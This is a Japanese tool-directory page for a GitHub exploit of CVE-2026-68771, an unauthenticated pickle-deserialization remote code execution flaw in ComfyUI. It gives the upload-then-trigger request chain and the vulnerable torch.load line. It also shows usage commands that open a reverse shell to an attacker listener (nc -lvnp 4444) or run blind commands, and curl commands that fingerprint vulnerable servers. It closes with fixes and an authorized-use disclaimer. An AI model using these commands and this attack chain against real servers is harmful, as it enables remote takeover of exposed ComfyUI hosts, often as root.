Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-68771_exploit — CVE-2026-68771 の認証なしエクスプロイト。ComfyUI における pickle デシリアライゼーション RCE です。/upload/image 経由で細工されたシャードを配置し、/prompt を通じてトリガーして、コマンドを実行するかリバースシェルを開きます。 | Kitploit
ツール/GitHubGitHub/0xdak/cve-2026-68771_exploit
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ペイロード開発
GitHub0xdak/cve-2026-68771_exploit

CVE-2026-68771_exploit

CVE-2026-68771 の認証なしエクスプロイト。ComfyUI における pickle デシリアライゼーション RCE です。/upload/image 経由で細工されたシャードを配置し、/prompt を通じてトリガーして、コマンドを実行するかリバースシェルを開きます。

リポジトリを見る
117日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-68771 — ComfyUI 認証不要ピクルス逆シリアライゼーション RCE

ComfyUI における LoadTrainingDataset ノードを介した認証不要のリモートコード実行。

LoadTrainingDataset.execute() は、サーバーの出力ディレクトリからデータセットシャードを torch.load(f) で読み込み、weights_only=True を指定しません。PyTorch < 2.6(weights_only が デフォルトで False の場合)では、細工された shard_*.pkl が読み込み時にそのピクルス __reduce__ を実行します(CWE-502)。 ComfyUI は認証なしで提供されており、/upload/image ルート(type=output 指定時)は 拡張子チェックなしで生のアップロードバイトを書き込むため、 を配置してから 認証なしの2リクエストでトリガーできます。

.pkl
  • 影響を受けるバージョン: PyTorch < 2.6 上の ComfyUI 0.23.0
  • デフォルトポート: 8188(認証なし)
  • CWE: 502(信頼できないデータの逆シリアライゼーション)
  • 影響: ComfyUI プロセスユーザー(通常は root)としての RCE

必要条件

Python 3 標準ライブラリのみ — 依存関係は不要です。

使用方法

root@kitploit:~
# リバースシェル(先にリスナーを起動: nc -lvnp 4444)
python3 exploit.py http://10.10.10.10:8188/ --shell 10.10.14.5:4444

# ブラインドの単一コマンド実行
python3 exploit.py http://10.10.10.10:8188/ -c 'id > /tmp/pwned'

コマンドはサーバー上で実行されます。その出力は返されないため、結果を確認するには --shell でリバース シェルを使用するか(または読み取り可能なパスに書き込んで)ください。

動作の仕組み

認証不要の2リクエスト:

  1. 配置 — POST /upload/image に type=output、subfolder=training_dataset、ファイル名 shard_0000.pkl を指定します。/upload/image ルートは生のバイトを書き込むため(このパスでは画像処理は行われません)、 ピクルスはそのまま output/training_dataset/shard_0000.pkl に配置されます。ピクルスの __reduce__ は (os.system, (cmd,)) を返します。

  2. トリガー — POST /prompt にワークフローを指定します: LoadTrainingDataset ノード (folder_name=training_dataset)を SaveLatent 出力ノードに接続します。出力ノードにより ComfyUI は LoadTrainingDataset を強制的に実行し、shard_*.pkl をグロブして次のように呼び出します:

    root@kitploit:~
    with open(shard_path, "rb") as f:
        shard_data = torch.load(f)      # weights_only=True なし -> torch < 2.6 ではピクルスが実行される
    

    逆シリアライゼーション中にピクルスの __reduce__ が os.system(cmd) を実行します。

ターゲットの特定

root@kitploit:~
curl -s http://10.10.10.10:8188/system_stats | python3 -c "import sys,json;print(json.load(sys.stdin)['system']['comfyui_version'])"
# 0.23.0
curl -s -o /dev/null -w '%{http_code}\n' http://10.10.10.10:8188/object_info/LoadTrainingDataset
# 200  -> 脆弱なノードが存在

修正方法

  • 上流の修正: シャードを torch.load(f, weights_only=True) で読み込みます。
  • PyTorch を >= 2.6 にアップグレードします。weights_only がデフォルトで True になり、制限付き アンピクラーが os.system を拒否します。
  • ComfyUI を信頼できないネットワークに公開せず、特権ユーザーとして実行しないでください。

免責事項

許可を受けたセキュリティテストおよび教育目的のみに使用してください。所有しているシステム、または 明示的なテスト許可を得たシステムに対してのみ使用してください。

ツールをダウンロード